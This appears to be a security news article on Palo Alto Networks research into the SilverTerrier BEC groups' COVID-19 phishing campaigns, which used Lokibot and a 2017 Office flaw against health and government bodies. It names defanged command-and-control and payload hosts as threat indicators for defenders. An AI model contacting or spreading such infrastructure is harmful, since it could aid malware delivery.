Researchers at Palo Alto Networks observed a Nigerian cyber gang, tracked as SilverTerrier and specialized in BEC attacks, using COVID-19 lures in a recent wave of attacks on healthcare and government organizations.
SilverTerrier has been active since at least 2014, it is a collective of over hundreds of individual threat actors.
BEC attacks continue to threaten organizations worldwide, according to the last Internet Crime Complaint Center (IC3) report, the FBI recorded 23,775 BEC attacks in 2019 that resulted in an estimated US$1.77 billion in global losses.
“Over the past 90 days (Jan. 30 – Apr. 30), we have observed three SilverTerrier actors/groups launch a series of 10 COVID-19 themed malware campaigns.” reads the analysis published by Palo Alto Networks. “Specifically, we find it alarming that several of these campaigns recklessly included targets at government healthcare agencies, local and regional governments, large universities with medical programs/centers, regional utilities, medical publishing firms, and insurance companies across the United States, Australia, Canada, Italy, and the United Kingdom.”
Between January 30 and April 30, 2020, the researchers observed three SilverTerrier groups launching ten COVID-19-themed malware campaigns, some of them also targeted organizations involved in the COVID-19 response.
The good news is that none of the attacks carried out by the SilverTerrier groups using COVID-19 lures has been successful in compromising the victims.
A first campaign was launched on January 30, 2020, experts observed with variations of the email subject sent in both English and Indonesian.
The email messages used an attachment disguised as an Indonesian health department document to deliver a variant of the Lokibot malware.
A few weeks later, threat actors launched multiple attacks that attempted to exploit the CVE 2017-11882 Office flaw to run a malicious executable.
The attacks targeted a major utility provider, a university, and a government agency in the United States, a health agency in Canada, a health insurance provider, an energy company in Australia, and a European medical publishing company to deliver various malware families.
Other campaigns observed in March and April targeted US organizations (government health agencies, universities with medical programs, state infrastructure, and a health insurance company), a Canadian health insurer, a university and regional government in Italy, and various government institutions in Australia.
“On April 8, 2020, we witnessed the most recent campaign by this actor. Distributed broadly, targets of this campaign included a government health agency, state infrastructure, and a health insurance company in the United States, in addition to a university and regional government in Italy, and various government institutions in Australia.” continues the report. “Disguised as COVID-19 relief materials coming from a “Thai Medical Department,” these phishing emails were delivered with one of two samples of Lokibot malware designed to call out to 185[.]126[.]202[.]111 for command and control. “
In the second half of March, a second SilverTerrier actor sent phishing emails to several organizations, including a government health agency in the United States, attempting to deliver the Lokibot malware to the intended victims.
On March 23 and 24, a third actor tracked as Black Emeka launched a series of attacks using emails disguised as COVID-19 information. The attached malware samples use PowerShell to download malicious payloads from the domain goldenlion[.]sg.
SilverTerrier attackers will continue to use COVID-19 lures to infect the systems of the victims.
“Given the global impacts of COVID-19, SilverTerrier actors have begun adapting their phishing campaigns and will likely continue to use COVID-19-themed emails to deliver commodity malware broadly in support of their objectives.” Palo Alto Networks concludes.
“In light of this trend, we encourage government agencies, healthcare and insurance organizations, public utilities, and universities with medical programs to apply extra scrutiny to COVID-19-related emails containing attachments.”
Please vote Security Affairs for European Cybersecurity Blogger Awards – VOTE FOR YOUR WINNERS
(SecurityAffairs – BEC, COVID-19)